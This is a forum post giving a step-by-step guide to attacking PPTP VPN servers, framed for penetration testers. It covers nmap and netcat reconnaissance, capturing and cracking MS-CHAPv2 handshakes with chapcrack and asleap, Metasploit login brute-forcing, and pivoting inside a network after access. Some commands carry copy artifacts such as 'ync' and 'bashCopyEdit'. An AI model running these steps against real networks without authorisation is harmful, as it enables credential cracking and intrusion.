stihl не предоставил(а) никакой дополнительной информации.
Basic info
The Point-to-Point Tunneling Protocol (PPTP) is a network protocol used to implement virtual private networks (VPNs). While PPTP has been widely adopted due to its ease of configuration and speed, it is notoriously vulnerable. Understanding how to identify, test, and exploit these vulnerabilities is essential for penetration testers.This guide covers in-depth technical methods to identify, analyze, and exploit PPTP, allowing security professionals to perform accurate vulnerability assessments and simulate real-world attack vectors.
Understanding the PPTP Protocol Structure
PPTP uses the following components:
TCP Port 1723: For control messages
GRE (Generic Routing Encapsulation): Protocol number 47, used to encapsulate PPP frames
Authentication Mechanisms and Weaknesses
PPTP uses Microsoft’s Point-to-Point Encryption (MPPE) combined with MS-CHAPv1 or MS-CHAPv2. Both have critical weaknesses.MS-CHAPv2 Authentication Vulnerabilities
Susceptible to dictionary attacks
Challenge-response mechanisms can be captured and cracked
NT Hash is derived from the user password, allowing offline brute-force
Identifying PPTP Services During Network Reconnaissance
Nmap Scanning for PPTP Detection
To identify active PPTP services, use the Nmap port scanner targeting TCP port 1723:
Код:
nmap -sS -p 1723 --script pptp-version <target-ip>Look for:
Open port 1723 (PPTP control channel)
OS fingerprinting to detect routers or VPN appliances
Banner Grabbing
Use Netcat to manually interact with the PPTP port:
Код:
ync <target-ip> 1723A PPTP server typically responds with GRE negotiation identifiers.
Capturing and Cracking MS-CHAPv2 Handshakes
Tools for PPTP Handshake Capture
Use a Man-in-the-Middle approach or capture with Wireshark on port 1723 and GRE:
Код:
tcpdump -i eth0 port 1723 or proto gre -w pptp_handshake.pcapCracking with chapcrack and asleap
Extract challenge and response:
Код:chapcrack -i pptp_handshake.pcap -o challenge_response.txt
Crack using asleap:
Код:asleap -C <challenge> -R <response> -W /path/to/wordlist
Exploiting PPTP Using Metasploit
Metasploit includes auxiliary modules for PPTP brute-force:
Код:
bashCopyEdituse auxiliary/scanner/vpn/pptp_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
runYou can combine this with previously cracked NTLM hashes to validate credentials.
VPN Pivoting After PPTP Access
After compromising PPTP, attackers can establish a VPN session and pivot into internal networks.Use tools like pptpsetup or pppd to establish the session:
Код:
pptpsetup --create pptpvpn --server <target-ip> --username user --password pass --encrypt
pon pptpvpnConfirm GRE tunneling is established and route internal traffic through the VPN interface.
Для просмотра ссылки Войди